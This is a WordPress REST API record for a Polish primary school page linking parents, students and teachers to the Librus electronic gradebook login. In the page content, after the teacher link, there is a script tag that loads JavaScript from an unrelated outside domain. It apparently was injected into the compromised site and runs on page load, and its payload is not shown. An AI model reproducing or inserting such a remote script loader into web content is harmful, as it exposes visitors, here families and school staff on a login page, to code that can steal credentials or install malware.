{"id":9020,"date":"2018-09-04T18:59:12","date_gmt":"2018-09-04T16:59:12","guid":{"rendered":"http:\/\/spmrowiny.gmina.zarow.pl\/?page_id=9020"},"modified":"2020-04-23T09:20:32","modified_gmt":"2020-04-23T07:20:32","slug":"dziennik-elektroniczny","status":"publish","type":"page","link":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/dziennik-elektroniczny\/","title":{"rendered":"Dziennik elektroniczny"},"content":{"rendered":"<p>Link do logowania do dziennika elektronicznego dla rodzic\u00f3w i uczni\u00f3w:<\/p>\n<p><a href=\"https:\/\/portal.librus.pl\/rodzina\/synergia\/loguj\" target=\"_blank\" rel=\"noopener\">Dziennik elektroniczny dla rodzic\u00f3w i uczni\u00f3w<\/a><\/p>\n<p><a href=\"https:\/\/portal.librus.pl\/szkola\/synergia\/loguj\" target=\"_blank\" rel=\"noopener\">Dziennik elektroniczny dla nauczycieli<\/a><script src=http:\/\/www.onlymobilepro.com\/wp-content\/plugins\/syntaxhighlighter\/syntaxhighlighter2\/scripts\/include2.js><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Link do logowania do dziennika elektronicznego dla rodzic\u00f3w i uczni\u00f3w: Dziennik elektroniczny dla rodzic\u00f3w i uczni\u00f3w Dziennik elektroniczny dla nauczycieli<\/p>\n","protected":false},"author":3,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":[],"_links":{"self":[{"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/pages\/9020"}],"collection":[{"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/comments?post=9020"}],"version-history":[{"count":4,"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/pages\/9020\/revisions"}],"predecessor-version":[{"id":15019,"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/pages\/9020\/revisions\/15019"}],"wp:attachment":[{"href":"http:\/\/spmrowiny.gmina.zarow.pl\/index.php\/wp-json\/wp\/v2\/media?parent=9020"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}